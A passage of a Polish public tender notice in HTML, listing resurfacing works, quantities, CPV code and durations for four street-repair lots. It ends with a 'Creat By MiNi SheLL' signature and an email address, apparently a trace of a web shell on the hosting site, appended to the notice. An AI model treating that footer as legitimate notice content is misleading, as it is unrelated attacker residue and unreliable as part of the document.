- ułożenie warstwy wyrównawczej z BA 0/8 mm - średnia grubość 4 cm - t 349,265;
- oczyszczenie warstwy wyrównawczej z BA wraz ze skropieniem emulsją asfaltową - m2 3.492,65;
- ułożenie warstwy ścieralnej z BA 0/12,8 mm grubości 4 cm - m2 3.492,65;
- regulacja wysokościowa włazów studni kanałowych - szt. 11;
- regulacja wysokościowa kratek ściekowych - szt. 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 67.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kompleksowy remont odcinka nawierzchni jezdni ul. Klonowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2 obejmuje remont wyeksploatowanego odcinka nawierzchni ul. Klonowej. W skład zadania nr 2 wchodzą następujące budowlane prace drogowe:
- frezowanie nawierzchni bitumicznej na grubość 4-5 cm z wywozem na odległość 7 km                               
  i wyładunkiem frezów - m2 1.214,88;
- oczyszczenie podbudowy wraz ze skropieniem emulsją asfaltową - m2 1.214,88;
- ułożenie warstwy wyrównawczej z BA 0/8 mm - średnia grubość 4 cm - t 121,49;
- oczyszczenie warstwy wyrównawczej z BA wraz ze skropieniem emulsją asfaltową - m2 1.214,88;
- ułożenie warstwy ścieralnej z BA 0/12,8 mm grubości 4 cm - m2 1.214,88;
- regulacja wysokościowa włazów studni kanałowych - szt. 1;
- regulacja wysokościowa kratek ściekowych - szt. 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 37.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kompleksowy remont nawierzchni jezdni ul. Brzozowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3 obejmuje remont całego ciągu nawierzchni ul. Brzozowej. W skład zadania nr 3 wchodzą następujące budowlane prace drogowe:
- frezowanie nawierzchni bitumicznej na grubość 4-5 cm z wywozem na odległość 7 km                            
  i wyładunkiem frezów - m2 1.375;
- oczyszczenie podbudowy wraz ze skropieniem emulsją asfaltową - m2 1.375;
- ułożenie warstwy wyrównawczej z BA 0/8 mm - średnia grubość 4 cm - t 137,5;
- oczyszczenie warstwy wyrównawczej z BA wraz ze skropieniem emulsją asfaltową - m2 1.375;
- ułożenie warstwy ścieralnej z BA 0/12,8 mm grubości 4 cm - m2 1.375;
- rozbiórka progu zwalniającego z elementów gumowych - kpl. 1;
- montaż progu zwalniającego z elementów gumowych (elementy z rozbiórki) - kpl. 1;
- regulacja wysokościowa włazów studni kanałowych - szt. 8;                                                                        - regulacja wysokościowa kratek ściekowych - szt. 5;
- regulacja wysokościowa skrzynek zaworów - szt. 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 37.</p></li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kompleksowy remont nawierzchni jezdni ul. Średniej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4 obejmuje remont całego ciągu nawierzchni ul. Średniej. W skład zadania nr 4 wchodzą następujące budowlane prace drogowe:
- cięcie nawierzchni bitumicznej - mb 10;
- oczyszczenie nawierzchni bitumicznej wraz ze skropieniem emulsją asfaltową - m2 290,5;
- ułożenie warstwy wyrównawczej z BA 0/8 mm - średnia grubość 4 cm - t 8,0;
- ułożenie warstwy ścieralnej z BA 0/12,8 mm grubości 4 cm - m2 262,5;
- regulacja wysokościowa włazów studni kanałowych - szt. 4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 37.</p></li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com